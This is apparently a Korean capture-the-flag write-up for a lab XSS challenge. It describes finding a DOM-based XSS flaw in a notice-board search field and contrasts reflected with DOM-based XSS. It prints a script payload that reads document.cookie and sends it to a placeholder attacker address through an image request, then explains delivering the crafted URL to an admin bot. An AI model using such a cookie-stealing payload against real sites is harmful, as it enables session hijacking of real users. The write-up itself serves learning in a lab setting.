[SegFault] (XSS) - XSS Challenge

[SegFault] (XSS)

XSS Challenge

관리자의 Cookie를 탈취하세요!

문제 파악

본 문제의 경우 XSS의 취약점을 찾고, 관리자 Bot에 해당 링크를 입력하여 공격자 서버로 Cookie 값을 탈취하여 받으면 Flag를 획득할 수 있는 방식으로 이루어져 있다.

하지만 현재 공격자 서버를 갖고 있지 않으므로 RequestBin을 이용하기로 한다.

우선 위의 [관리자 방문 Bot Link]에 접속하면 다음과 같은 URL 입력창을 볼 수 있다.

XSS 취약점을 발견하고 해당 링크를 위의 URL에 입력하면 공격자 서버(RequestBin)로 쿠키 값이 날아오는 방식이다.

이제 아래의 문제 링크에 접속하면 다음과 같은 창이 나온다.

우선 회원가입 후 로그인을 시도해본다.

마이페이지에서는 XSS 취약점이 발견되지 않아 공지사항을 살펴보기로 한다.

먼저 검색 기능을 확인해본다.

 

XSS Point

입력 값에 대하여 반사되어 나오는 출력값이 존재한다.

하지만 Burp를 통해 확인해본 결과 출력되는 값이 노출되어 있지 않는 것을 확인할 수 있었다.

이런 경우에는 Reflected가 아닌 Dom Based 를 생각해야 한다.

---

풀이 과정 (해결 방안)

Dom Based 를 이용하기 위한 페이로드(Paylaod)를 작성한다..

페이로드(Payload)

document.write="<script>
var cookieData = document.cookie;
var i = new Image();
i.src = "https://공격자 주소/?cookie="+cookieData;
</script>"

위의 페이로드를 검색어에 입력하는 경우 스크립트가 실행되는 것을 확인할 수 있다.

 

스크립트 삽입

해당 요청의 경우 GET Method 이므로 해당 URL을 관리자 Bot에 보내준다.

탈취된 쿠키(Cookie)가 공격자의 주소(RequestBin)으로 받아와 지는 것을 확인할 수 있다.

위와 같이 검색어를 입력하는 일련의 과정을 담은 URL로의 접속 유도를 통하여 원하는 flag가 획득된 것을 확인하였다.

---

취약점에 관한 고찰

본 문제의 경우 검색 기능의 입력값이 화면에 그대로 노출되는 것을 이용한 취약점이다.

화면에 입력값이 그대로 노출되는 경우 Reflected XSS 취약점이라고 일반적으로 생각할 수 있지만, Reflected 의 경우 해당 요청의 응답에 '반사' 되어 직접적으로 노출되어 있어야한다.
하지만 본 문제의 취약점의 경우 입력값이 화면에는 노출되어 있으나, Burp로 확인한 응답 자체에는 존재하지 않는 것을 확인할 수 있다. 이런 경우에는 Reflected XSS 가 아닌 Dom Based 취약점을 의심해봐야 한다.

Dom Based 의 경우 브라우저에서 조립하여 나온 것으로 해당 취약점과 Reflected를 잘 구분할 줄 알아야 한다.

---

질문 환영, 수정 및 보완에 대한 지적 환영